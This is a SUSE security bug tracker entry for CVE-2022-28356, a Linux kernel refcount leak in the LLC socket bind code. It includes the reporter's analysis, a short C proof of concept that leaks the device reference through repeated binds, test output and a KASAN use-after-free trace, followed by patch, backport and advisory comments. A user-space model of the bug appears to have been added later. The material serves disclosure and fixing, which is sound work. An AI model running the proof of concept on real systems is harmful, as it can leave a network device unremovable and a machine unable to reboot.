Bug 1197391 - (CVE-2022-28356) VUL-0: CVE-2022-28356: kernel-source: refcount leak in llc_ui_bind and llc_ui_autobind
Status: IN_PROGRESS
: 1197390 (view as bug list)
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
: P2 - High : Normal
Assigned To: Denis Kirjanov
Security Team bot
https://smash.suse.de/issue/326949/
CVSSv3.1:SUSE:CVE-2022-28356:5.5:(AV:...
 
Reported: 2022-03-22 10:50 UTC by Gianluca Gabrielli
Modified: 2022-09-16 19:27 UTC (History)

gabriele.sonnu: needinfo? (mkubecek)


Description Gianluca Gabrielli 2022-03-22 10:50:20 UTC
Sent directly to security@suse.de
---------------------------------

I found a refcount leak bug in llc_ui_bind() from /net/llc/af_llc.c. In this function, if it finds an ARPHRD_ETHER type net device, it will hold the device's refcount:

'''
if (sk->sk_bound_dev_if) {
    llc->dev = dev_get_by_index_rcu(&init_net, sk->sk_bound_dev_if);
    if (llc->dev) {
        if (is_zero_ether_addr(addr->sllc_mac))
            memcpy(addr->sllc_mac, llc->dev->dev_addr,
                   IFHWADDRLEN);
        if (addr->sllc_arphrd != llc->dev->type ||
            !ether_addr_equal(addr->sllc_mac,
                              llc->dev->dev_addr)) {
            rc = -EINVAL;
            llc->dev = NULL;
        }
    }
} else
    llc->dev = dev_getbyhwaddr_rcu(&init_net, addr->sllc_arphrd,
                                   addr->sllc_mac);
dev_hold_track(llc->dev, &llc->dev_tracker, GFP_ATOMIC);
'''

but doesn't release the device if it fails to find a usable sap later:

'''
    sap = llc_sap_find(addr->sllc_sap);
    if (!sap) {
        sap = llc_sap_open(addr->sllc_sap, NULL);
        rc = -EBUSY; /* some other network layer is using the sap */
        if (!sap)
            goto out;
    } else {
        ...
out_put:
    llc_sap_put(sap);
out:
    release_sock(sk);
'''

If we call llc_ui_bind() on a socket multiple times and provide it a used sllc_sap each time, the device's refcount will be increased unexpectedly, and the device cannot be removed then.
A simple PoC code is as below:

'''
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy */
#include <unistd.h>   /* close */
#include <errno.h>
#include <sys/socket.h>
#include <linux/llc.h>
#include <time.h>

#define REVISE_NUM 20
#define ARPHRD_ETHER 1

int main(void)
{
    int s1, s2, ret, i;
    char eth0[] = {0, 0, 0, 0, 0, 0}; // change it
    int try;
    struct sockaddr_llc addr;

    memset(&addr, 0, sizeof(struct sockaddr_llc));
    addr.sllc_family = AF_LLC;
    addr.sllc_arphrd = ARPHRD_ETHER;
    memcpy(addr.sllc_mac, eth0, 6);
    addr.sllc_sap = 20;

    s1 = socket(PF_LLC, SOCK_STREAM, 0);
    s2 = socket(PF_LLC, SOCK_STREAM, 0);

    printf("s1 = %d, s2 = %d\n", s1, s2);


    ret = bind(s1, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind1 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind2 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind3 return %d\n", ret);
    ret = bind(s2, (struct sockaddr *)&addr, sizeof(struct sockaddr_llc));
    printf("bind4 return %d\n", ret);

    close(s1);
    close(s2);

    return 0;
}
'''

After executing the PoC above, we can neither remove the bound net_device nor reboot the OS. The PoC is tested on Linux-5.17-rc5:

'''
/ # /home/pwn/exp
s1 = 3, s2 = 4
bind1 return 0
bind2 return -1
bind3 return -1
bind4 return -1
/ #
/ # reboot
/ #
/ # rmmod e1000
[  185.976235] unregister_netdevice: waiting for eth0 to become free. Usage count = 3
[  196.056399] unregister_netdevice: waiting for eth0 to become free. Usage count = 3
'''

An attacker can leverage this flaw to trigger an integer overflow on the device's refcount and eventually lead to a use-after-free bug:

'''
[   97.850647] ==================================================================
[   97.850647] BUG: KASAN: use-after-free in llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647] Read of size 2 at addr ffff88803e9b2128 by task swapper/2/0
[   97.850647]
[   97.850647] CPU: 2 PID: 0 Comm: swapper/2 Tainted: G            E     5.17.0-rc5 #2
[   97.850647] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[   97.850647] Call Trace:
[   97.850647]  <IRQ>
[   97.850647]  dump_stack_lvl+0x89/0xb5
[   97.850647]  print_address_description.constprop.0+0x24/0x150
[   97.850647]  ? llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  kasan_report.cold+0x82/0xdb
[   97.850647]  ? llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  __asan_report_load2_noabort+0x14/0x20
[   97.850647]  llc_alloc_frame+0x2aa/0x320 [llc2]
[   97.850647]  ? llc_conn_set_p_flag+0xf0/0xf0 [llc2]
[   97.850647]  llc_conn_ac_send_sabme_cmd_p_set_x+0x56/0x470 [llc2]
[   97.850647]  ? __sanitizer_cov_trace_switch+0x54/0x90
[   97.850647]  ? llc_conn_set_p_flag+0xf0/0xf0 [llc2]
[   97.850647]  llc_conn_state_process+0x3fa/0x13f0 [llc2]
[   97.850647]  llc_conn_tmr_common_cb+0x2c0/0x6d0 [llc2]
[   97.850647]  ? llc_conn_busy_tmr_cb+0x30/0x30 [llc2]
[   97.850647]  llc_conn_ack_tmr_cb+0x23/0x30 [llc2]
[   97.850647]  call_timer_fn+0x46/0x290
[   97.850647]  ? llc_conn_busy_tmr_cb+0x30/0x30 [llc2]
[   97.850647]  __run_timers.part.0+0x6b0/0x9b0
[   97.850647]  ? call_timer_fn+0x290/0x290
[   97.850647]  ? __sanitizer_cov_trace_cmp4+0x16/0x20
[   97.850647]  ? ktime_get+0xff/0x150
[   97.850647]  ? lapic_next_event+0x5b/0x90
[   97.850647]  ? __sanitizer_cov_trace_const_cmp4+0x16/0x20
[   97.850647]  ? clockevents_program_event+0x14a/0x390
[   97.850647]  run_timer_softirq+0xb8/0x1b0
[   97.850647]  __do_softirq+0x1ac/0x5af
[   97.850647]  __irq_exit_rcu+0xd9/0x190
[   97.850647]  irq_exit_rcu+0xe/0x10
[   97.850647]  sysvec_apic_timer_interrupt+0x98/0xb0
[   97.850647]  </IRQ>
[   97.850647]  <TASK>
[   97.850647]  asm_sysvec_apic_timer_interrupt+0x12/0x20
[   97.850647] RIP: 0010:native_safe_halt+0xb/0x10
'''

The function llc_ui_autobind() has the same issue.
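
A user-space model of the error path described in this report, added here as an illustration; it is not kernel code and not the upstream patch. All `model_*` names are hypothetical, and the model assumes that closing a socket drops only the one reference its `dev` pointer still records.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-ins for net_device and the LLC socket state. */
struct model_dev  { int refcnt; };
struct model_sock { struct model_dev *dev; int sap; };   /* sap < 0: unbound */

typedef int (*model_bind_fn)(struct model_sock *, struct model_dev *, int);

static unsigned char sap_taken[256];

static void model_hold(struct model_dev *d) { if (d) d->refcnt++; }
static void model_put(struct model_dev *d)  { if (d) d->refcnt--; }

/* Shape of the reported bug: the hold happens first, the early exit skips the put. */
static int model_bind_leaky(struct model_sock *sk, struct model_dev *dev, int sap)
{
    int rc = -EINVAL;

    if (sk->sap >= 0 || sap < 0 || sap > 255)
        goto out;
    sk->dev = dev;                 /* overwrites any pointer from a failed attempt */
    model_hold(sk->dev);
    rc = -EBUSY;
    if (sap_taken[sap])
        goto out;                  /* reference taken above is never dropped */
    sap_taken[sap] = 1;
    sk->sap = sap;
    rc = 0;
out:
    return rc;
}

/* One way to balance it (an assumption, not the merged fix): undo the hold on any error. */
static int model_bind_balanced(struct model_sock *sk, struct model_dev *dev, int sap)
{
    struct model_dev *held = NULL;
    int rc = -EINVAL;

    if (sk->sap >= 0 || sap < 0 || sap > 255)
        goto out;
    held = dev;
    model_hold(held);
    rc = -EBUSY;
    if (sap_taken[sap])
        goto out;
    sap_taken[sap] = 1;
    sk->sap = sap;
    sk->dev = held;                /* pointer is published only on success */
    rc = 0;
out:
    if (rc)
        model_put(held);           /* no-op when nothing was held */
    return rc;
}

static void model_close(struct model_sock *sk)
{
    if (sk->sap >= 0)
        sap_taken[sk->sap] = 0;
    model_put(sk->dev);            /* drops only the reference still recorded */
    sk->dev = NULL;
    sk->sap = -1;
}

/* Constructed sequence: one successful bind, then repeated failed binds of the
 * same SAP on a second socket, then both sockets closed.
 * Returns the references left over beyond the initial one, or -1 on model error. */
static int model_leaked_refs(model_bind_fn bind_fn, int failed_attempts)
{
    struct model_dev eth = { 1 };                     /* initial reference */
    struct model_sock s1 = { NULL, -1 }, s2 = { NULL, -1 };
    int i;

    memset(sap_taken, 0, sizeof(sap_taken));
    if (bind_fn(&s1, &eth, 20) != 0)
        return -1;
    for (i = 0; i < failed_attempts; i++)
        if (bind_fn(&s2, &eth, 20) != -EBUSY)
            return -1;
    model_close(&s1);
    model_close(&s2);
    return eth.refcnt - 1;
}

int main(void)
{
    printf("leaky,    3 failed binds: %d leaked\n",
           model_leaked_refs(model_bind_leaky, 3));
    printf("balanced, 3 failed binds: %d leaked\n",
           model_leaked_refs(model_bind_balanced, 3));
    return 0;
}
```

In this model every failed bind after the first on the same socket strands one reference, so the count grows with each retry while the balanced variant always returns to its starting value.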
Comment 2 Marcus Meissner 2022-03-22 10:58:40 UTC
*** Bug 1197390 has been marked as a duplicate of this bug. ***
Comment 4 Gianluca Gabrielli 2022-03-28 13:17:54 UTC
The patch is now merged in mainline at 764f4eb6846f5475f1244767d24d25dd86528a4a.
Comment 5 Gianluca Gabrielli 2022-03-28 13:28:29 UTC
All our branches are affected, please backport the patch.
Comment 7 Gianluca Gabrielli 2022-04-04 07:23:37 UTC
CVE-2022-28356 assigned by MITRE
Comment 17 Gianluca Gabrielli 2022-04-06 12:23:23 UTC
published in osss
Comment 22 Swamp Workflow Management 2022-04-19 13:30:28 UTC
SUSE-SU-2022:1255-1: An update that solves 20 vulnerabilities, contains one feature and has three fixes is now available.

Category: security (important)
Bug References: 1189562,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197131,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-0886,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise Server 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1, kernel-zfcpdump-4.12.14-150000.150.89.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150000.150.89.1, kernel-livepatch-SLE15_Update_29-1-150000.1.3.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    kernel-default-4.12.14-150000.150.89.1, kernel-docs-4.12.14-150000.150.89.1, kernel-obs-build-4.12.14-150000.150.89.1, kernel-source-4.12.14-150000.150.89.1, kernel-syms-4.12.14-150000.150.89.1, kernel-vanilla-4.12.14-150000.150.89.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150000.150.89.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Swamp Workflow Management 2022-04-19 13:35:12 UTC
SUSE-SU-2022:1256-1: An update that solves 19 vulnerabilities, contains two features and has 6 fixes is now available.

Category: security (important)
Bug References: 1189562,1193738,1194943,1195051,1195254,1195353,1196018,1196114,1196433,1196468,1196488,1196514,1196639,1196761,1196830,1196836,1196942,1196973,1197227,1197331,1197366,1197391,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234,SLE-23652
Sources used:
openSUSE Leap 15.4 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
openSUSE Leap 15.3 (src):    kernel-debug-4.12.14-150100.197.111.1, kernel-default-4.12.14-150100.197.111.1, kernel-kvmsmall-4.12.14-150100.197.111.1, kernel-vanilla-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1, kernel-zfcpdump-4.12.14-150100.197.111.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-livepatch-SLE15-SP1_Update_30-1-150100.3.3.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-150100.197.111.1
SUSE Enterprise Storage 6 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1
SUSE CaaS Platform 4.0 (src):    kernel-default-4.12.14-150100.197.111.1, kernel-docs-4.12.14-150100.197.111.1, kernel-obs-build-4.12.14-150100.197.111.1, kernel-source-4.12.14-150100.197.111.1, kernel-syms-4.12.14-150100.197.111.1

Comment 24 Swamp Workflow Management 2022-04-19 16:29:51 UTC
SUSE-SU-2022:1266-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.94.1, kernel-source-azure-4.12.14-16.94.1, kernel-syms-azure-4.12.14-16.94.1

Comment 25 Swamp Workflow Management 2022-04-19 16:34:03 UTC
SUSE-SU-2022:1267-1: An update that solves 20 vulnerabilities, contains one feature and has 7 fixes is now available.

Category: security (important)
Bug References: 1180153,1189562,1193738,1194943,1195051,1195353,1196018,1196114,1196468,1196488,1196514,1196573,1196639,1196761,1196830,1196836,1196942,1196973,1197211,1197227,1197331,1197366,1197391,1197462,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-18234
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE OpenStack Cloud 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kgraft-patch-SLE12-SP4_Update_26-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.96.1

Comment 26 Swamp Workflow Management 2022-04-26 10:23:05 UTC
SUSE-SU-2022:1402-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.84.1, kernel-rt_debug-4.12.14-10.84.1, kernel-source-rt-4.12.14-10.84.1, kernel-syms-rt-4.12.14-10.84.1

Comment 37 Swamp Workflow Management 2022-05-16 13:23:26 UTC
SUSE-SU-2022:1669-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
SUSE Linux Enterprise Realtime Extension 15-SP3 (src):    release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.88.2, kernel-rt_debug-5.3.18-150300.88.2, kernel-source-rt-5.3.18-150300.88.2, kernel-syms-rt-5.3.18-150300.88.1, release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.88.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.88.2

Comment 38 Swamp Workflow Management 2022-05-16 13:27:23 UTC
SUSE-SU-2022:1668-1: An update that solves 13 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1195651,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.89.1, kernel-rt_debug-4.12.14-10.89.1, kernel-source-rt-4.12.14-10.89.1, kernel-syms-rt-4.12.14-10.89.1

Comment 39 Swamp Workflow Management 2022-05-16 13:37:19 UTC
SUSE-SU-2022:1676-1: An update that solves 16 vulnerabilities, contains 6 features and has 25 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1121726,1137728,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197914,1197926,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198660,1198742,1198825,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-15176,SLE-8449
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1

Comment 40 Swamp Workflow Management 2022-05-16 16:23:41 UTC
SUSE-SU-2022:1687-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-64kb-5.3.18-150300.59.68.1, kernel-debug-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-docs-5.3.18-150300.59.68.1, kernel-kvmsmall-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-obs-qa-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-livepatch-SLE15-SP3_Update_18-1-150300.7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1

Comment 41 Swamp Workflow Management 2022-05-16 16:28:30 UTC
SUSE-SU-2022:1686-1: An update that solves 13 vulnerabilities and has 16 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.121.2
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.121.2, kernel-obs-build-4.12.14-122.121.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kernel-source-4.12.14-122.121.2, kernel-syms-4.12.14-122.121.2
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kgraft-patch-SLE12-SP5_Update_31-1-8.5.2
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.121.2

Comment 48 Petr Mladek 2022-06-24 10:38:04 UTC
The fix is still missing in the following branches:

    SLE15-SP4, cve/linux-2.6.32, cve/linux-3.0

Or they affected, please?
Comment 50 Takashi Iwai 2022-08-12 12:58:28 UTC
Adding Denis to Cc, in case he can have spare time for handling this.

FWIW, the backport to both SLE15-SP4 and cve/linux-3.0 looks pretty straightforward, just picking up the existing backport patch from cve/linux-5.3 or cve/linux-4.4 should suffice.  (The upstream change itself can't be applied due to the lack of dev_put_track() API function.)
Comment 51 Denis Kirjanov 2022-08-31 13:03:39 UTC
(In reply to Takashi Iwai from comment #50)
> Adding Denis to Cc, in case he can have spare time for handling this.
> 
> FWIW, the backport to both SLE15-SP4 and cve/linux-3.0 looks pretty
> straightforward, just picking up the existing backport patch from
> cve/linux-5.3 or cve/linux-4.4 should suffice.  (The upstream change itself
> can't be applied due to the lack of dev_put_track() API function.)

pushed to cve/linux-3.0, cve/linux-3.12 and SLE15-SP4
Comment 56 Swamp Workflow Management 2022-09-16 13:22:31 UTC
